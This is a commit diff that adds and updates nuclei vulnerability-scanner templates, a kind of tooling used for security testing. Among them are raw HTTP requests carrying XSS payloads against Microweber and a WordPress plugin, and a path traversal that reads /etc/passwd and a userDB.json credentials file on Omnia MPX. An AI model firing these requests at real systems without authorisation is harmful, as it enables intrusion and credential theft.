1、up PoCs

2、fixed filefuzz TestIs404 bug 3、fixed nuclei hang bug 2022-08-04
GhostTroops · Aug 4, 2022 · 011b0b4 · 011b0b4
1 parent c8e9b2b
commit 011b0b4
Show file tree

Hide file tree

Showing 19 changed files with 441 additions and 175 deletions.
diff --git a/config/nuclei-templates/.new-additions b/config/nuclei-templates/.new-additions
@@ -1,61 +1,40 @@
-cves/2015/CVE-2015-4666.yaml
-cves/2018/CVE-2018-1000856.yaml
-cves/2018/CVE-2018-19136.yaml
-cves/2018/CVE-2018-19137.yaml
-cves/2018/CVE-2018-19751.yaml
-cves/2018/CVE-2018-19752.yaml
-cves/2018/CVE-2018-19892.yaml
-cves/2019/CVE-2019-9922.yaml
-cves/2021/CVE-2021-36450.yaml
-cves/2022/CVE-2022-0656.yaml
-cves/2022/CVE-2022-35416.yaml
-exposed-panels/claris-filemaker-webdirect.yaml
-exposed-panels/honeywell-xl-web-controller.yaml
-exposed-panels/icewarp-panel-detect.yaml
-exposed-panels/kafka-manager-panel.yaml
-exposed-panels/noescape-login.yaml
-exposed-panels/rustici-content-controller.yaml
-exposed-panels/smartping-dashboard.yaml
-exposed-panels/sonicwall-analyzer-login.yaml
-exposed-panels/tembosocial-panel.yaml
-exposed-panels/tenda-web-master.yaml
-exposed-panels/tiny-file-manager.yaml
-exposed-panels/veeam-backup-gcp.yaml
-exposed-panels/vmware-carbon-black-edr.yaml
-exposed-panels/vmware-cloud-availability.yaml
-exposed-panels/vmware-cloud-director.yaml
-exposed-panels/vmware-ftp-server.yaml
-exposed-panels/vmware-horizon-daas.yaml
-exposed-panels/vmware-vcenter-converter-standalone.yaml
-exposed-panels/vmware-vcloud-director.yaml
-exposed-panels/web-file-manager.yaml
-exposures/configs/config-rb.yaml
-exposures/configs/gcloud-config-default.yaml
-exposures/configs/phpstan-config.yaml
-exposures/configs/wgetrc-config.yaml
-exposures/files/composer-auth-json.yaml
-exposures/files/credentials-json.yaml
-exposures/files/environment-rb.yaml
-exposures/files/gcloud-access-token.yaml
-exposures/files/gcloud-credentials.yaml
-exposures/files/get-access-token-json.yaml
-exposures/files/google-api-private-key.yaml
-exposures/files/google-services-json.yaml
-exposures/files/jsapi-ticket-json.yaml
-exposures/files/npm-cli-metrics-json.yaml
-exposures/files/oauth-credentials-json.yaml
-exposures/files/secret-token-rb.yaml
-exposures/files/service-account-credentials.yaml
-exposures/files/symfony-properties-ini.yaml
-exposures/files/token-info-json.yaml
-exposures/files/token-json.yaml
-exposures/files/wget-hsts-list-exposure.yaml
-exposures/files/ws-ftp-ini.yaml
-exposures/logs/event-debug-server-status.yaml
-exposures/logs/git-logs-exposure.yaml
-technologies/default-page-azure-container.yaml
-technologies/default-parallels-plesk.yaml
-technologies/json-server.yaml
-technologies/samsung-smarttv-debug.yaml
-vulnerabilities/other/opennms-log4j-jndi-rce.yaml
-vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
+cves/2018/CVE-2018-1000671.yaml
+cves/2020/CVE-2020-13405.yaml
+cves/2020/CVE-2020-9043.yaml
+cves/2022/CVE-2022-0870.yaml
+cves/2022/CVE-2022-0921.yaml
+cves/2022/CVE-2022-0952.yaml
+cves/2022/CVE-2022-0963.yaml
+cves/2022/CVE-2022-1386.yaml
+cves/2022/CVE-2022-1937.yaml
+cves/2022/CVE-2022-2486.yaml
+cves/2022/CVE-2022-2487.yaml
+cves/2022/CVE-2022-2488.yaml
+cves/2022/CVE-2022-30073.yaml
+cves/2022/CVE-2022-34049.yaml
+exposed-panels/goanywhere-mft-login.yaml
+exposed-panels/mailwatch-login.yaml
+exposed-panels/scriptcase/scriptcase-panel.yaml
+exposed-panels/scriptcase/scriptcase-prod-login.yaml
+exposures/apis/drupal-jsonapi-user-listing.yaml
+misconfiguration/springboot/springboot-caches.yaml
+misconfiguration/springboot/springboot-flyway.yaml
+misconfiguration/springboot/springboot-scheduledtasks.yaml
+technologies/nextcloud-owncloud-detect.yaml
+token-spray/api-clickup.yaml
+token-spray/api-clockify.yaml
+token-spray/api-cloudconvert.yaml
+token-spray/api-codestats.yaml
+token-spray/api-craftmypdf.yaml
+token-spray/api-flowdash.yaml
+token-spray/api-html2pdf.yaml
+token-spray/api-monday.yaml
+token-spray/api-pdflayer.yaml
+vulnerabilities/backdoor/jexboss-backdoor.yaml
+vulnerabilities/jira/jira-servicedesk-signup.yaml
+vulnerabilities/other/cvms-sqli.yaml
+vulnerabilities/other/loancms-sqli.yaml
+vulnerabilities/other/weiphp-sql-injection.yaml
+vulnerabilities/other/zms-sqli.yaml
+vulnerabilities/other/zzcms-xss.yaml
+vulnerabilities/wordpress/analytify-plugin-xss.yaml
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0921.yaml
@@ -17,7 +17,7 @@ info:
     cve-id: CVE-2022-0954
     cwe-id: CWE-79
   metadata:
-    verified: "true"
+    verified: true
   tags: cve,cve2022,xss,microweber
 
 requests:

diff --git a/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml b/config/nuclei-templates/cves/2022/CVE-2022-0954.yaml
@@ -0,0 +1,57 @@
+id: CVE-2022-0954
+
+info:
+  name: Microweber - Cross-site Scripting
+  author: amit-jd
+  severity: medium
+  description: |
+    Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
+  reference:
+    - https://github.com/advisories/GHSA-8c76-mxv5-w4g8
+    - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
+    - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0954
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2022-0954
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,xss,microweber
+
+requests:
+  - raw:
+      - |
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /api/save_option HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}/admin/view:shop/action:options
+
+        option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
+
+      - |
+        POST /module/ HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}/admin/view:shop/action:options
+
+        module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
+
+    cookie-reuse: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2,"true")'
+          - contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
+          - 'contains(all_headers_3,"text/html")'
+          - 'status_code_3==200'
+        condition: and
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1906.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-1906
+
+info:
+  name: Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting
+  author: random-robbie
+  severity: medium
+  description: |
+    The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled.
+  reference:
+    - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1906
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906
+  metadata:
+    verified: true
+    google-dork: inurl:/wp-content/plugins/digiproveblog
+  tags: cve,cve2022,wordpress,xss,wp-plugin,wp
+
+requests:
+  - raw:
+      - |
+        GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "got message <script>alert(document.domain)</script>"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/dns/cname-service-detection.yaml b/config/nuclei-templates/dns/cname-service-detection.yaml
diff --git a/config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml b/config/nuclei-templates/exposed-panels/jamf-setup-assistant.yaml
@@ -0,0 +1,25 @@
+id: jamf-setup-assistant
+
+info:
+  name: Jamf Pro Setup Assistant
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Jamf Pro Setup"
+  tags: jamf,setup,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/setupAssistant.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Jamf Pro Setup Assistant"
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/exposures/configs/symfony-profiler.yaml b/config/nuclei-templates/exposures/configs/symfony-profiler.yaml
@@ -4,16 +4,20 @@ info:
   name: Symfony Profiler
   author: pdteam
   severity: high
+  metadata:
+    verified: true
+    shodan-query: http.html:"symfony Profiler"
   tags: config,exposure,symfony
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/_profiler/empty/search/results?limit=10"
+      - "{{BaseURL}}/app_dev.php/_profiler/empty/search/results?limit=10"
+
+    stop-at-first-match: true
     matchers:
       - type: word
-        words:
-          - "<title>Symfony Profiler</title>"
-          - "symfony/profiler/"
-        condition: and
         part: body
+        words:
+          - "Symfony Profiler"
diff --git a/config/nuclei-templates/misconfiguration/symfony-debug.yaml b/config/nuclei-templates/misconfiguration/symfony-debug.yaml
@@ -0,0 +1,35 @@
+id: symfony-debug
+
+info:
+  name: Symfony Debug Mode
+  author: organiccrap,pdteam
+  severity: high
+  description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code.
+  reference:
+    - https://github.com/synacktiv/eos
+  metadata:
+    verified: true
+    shodan-query: http.html:"symfony Profiler"
+  tags: symfony,debug
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'x-debug-token-link:'
+          - '/_profiler/'
+        condition: and
+        case-insensitive: true
+
+      - type: word
+        part: body
+        words:
+          - 'debug mode</a> is enabled.'
+
+# Enhanced by mp on 2022/04/12
diff --git a/config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml b/config/nuclei-templates/vulnerabilities/jira/jira-service-desk-signup.yaml
diff --git a/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml b/config/nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml
@@ -0,0 +1,35 @@
+id: omnia-mpx-lfi
+
+info:
+  name: Omnia MPX 1.5.0+r1 - Path Traversal
+  author: arafatansari,ritikchaddha
+  severity: high
+  description: |
+    Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
+  reference:
+    - https://www.exploit-db.com/exploits/50996
+  metadata:
+    verified: true
+    shodan-query: http.html:"Omnia MPX"
+  tags: omnia,mpx,lfi,traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
+      - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: word
+        part: body
+        words:
+          - '"username":'
+          - '"password":'
+          - '"id":'
+        condition: and